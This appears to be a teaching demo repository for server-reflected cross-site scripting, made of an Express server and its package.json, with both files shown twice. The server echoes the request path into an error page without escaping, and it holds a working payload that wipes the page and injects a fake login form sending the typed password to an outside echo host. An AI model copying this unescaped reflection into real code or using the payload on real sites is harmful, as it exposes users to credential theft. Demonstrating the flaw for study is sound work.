CarlOlson/index.js

## index.js
// Example of Server Reflected XSS
// https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting

const express = require('express');
const session = require('express-session');
const app = express();
const port = 3000;

var payload = "<script>\
 document.body.innerHTML = '';\
</script>\
<form action=\"http://urlecho.appspot.com/echo\" method=\"get\">\
	     <input placeholder=\"username\" />\
<input type=\"password\" placeholder=\"password\" name=\"body\" />\
<button type=\"submit\">Login</button>\
</form>";

app.use(session(
    { secret: 'secret'
    , resave: false
    , saveUninitialized: false
    }));

app.get('/', (req, resp) => {
    resp.send('<a href="http://localhost:3000/' + encodeURI(payload) + '">Malicious link</a>');
});

app.get('/error', (req, resp) => {
    resp.send(req.session.error || '');
    req.session.error = '';
});

app.get(/(.*)/, (req, resp) => {
    req.session.error = 'page not found: ' + req.params[0];
    resp.redirect('/error');
});

app.listen(port);

## package.json
{
  "name": "xss",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "start": "node index.js"
  },
  "author": "",
  "license": "ISC",
  "dependencies": {
    "express": "^4.14.1",
    "express-session": "^1.15.0"
  }
}
	// Example of Server Reflected XSS
	// https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting

	const express = require('express');
	const session = require('express-session');
	const app = express();
	const port = 3000;

	var payload = "<script>\
	document.body.innerHTML = '';\
	</script>\
	<form action=\"http://urlecho.appspot.com/echo\" method=\"get\">\
	<input placeholder=\"username\" />\
	<input type=\"password\" placeholder=\"password\" name=\"body\" />\
	<button type=\"submit\">Login</button>\
	</form>";

	app.use(session(
	{ secret: 'secret'
	, resave: false
	, saveUninitialized: false
	}));

	app.get('/', (req, resp) => {
	resp.send('<a href="http://localhost:3000/' + encodeURI(payload) + '">Malicious link</a>');
	});

	app.get('/error', (req, resp) => {
	resp.send(req.session.error \|\| '');
	req.session.error = '';
	});

	app.get(/(.*)/, (req, resp) => {
	req.session.error = 'page not found: ' + req.params[0];
	resp.redirect('/error');
	});

	app.listen(port);
	{
	"name": "xss",
	"version": "1.0.0",
	"description": "",
	"main": "index.js",
	"scripts": {
	"start": "node index.js"
	},
	"author": "",
	"license": "ISC",
	"dependencies": {
	"express": "^4.14.1",
	"express-session": "^1.15.0"
	}
	}